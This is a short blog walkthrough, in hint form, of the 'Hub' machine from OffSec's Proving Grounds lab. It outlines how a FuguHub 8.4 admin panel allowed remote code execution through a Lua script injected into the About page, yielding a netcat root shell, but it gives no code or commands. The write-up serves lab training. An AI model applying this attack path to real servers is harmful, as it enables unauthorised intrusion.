June 2, 2025

Hub Proving Grounds Write-Up

Adrian Reategui
Share
Proving Grounds Hub machine walkthrough

SUMMARY

This write-up covers the Hub machine from Offsec’s Proving Grounds, a Linux machine where a web file server admin panel allowed direct code injection.

Port 80 hosted FuguHub 8.4. During setup, an admin user was created. Research revealed the version was vulnerable to RCE via a malicious Lua script injected into the customizable About page in the admin panel. The payload was placed manually in the About page content, and navigating to the About page as a browser triggered execution. A netcat listener received the connection as root — no privilege escalation required.

PATH TO FOLLOW

  1. Reconnaissance & FuguHub Discovery on Port 80
  2. Admin Panel Setup & Access
  3. Malicious Lua Payload Injection via About Page
  4. Trigger Execution by Visiting the About Page
  5. Direct Shell as Root

Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.

Linux FuguHub Lua RCE ProvingGrounds

Table of Contents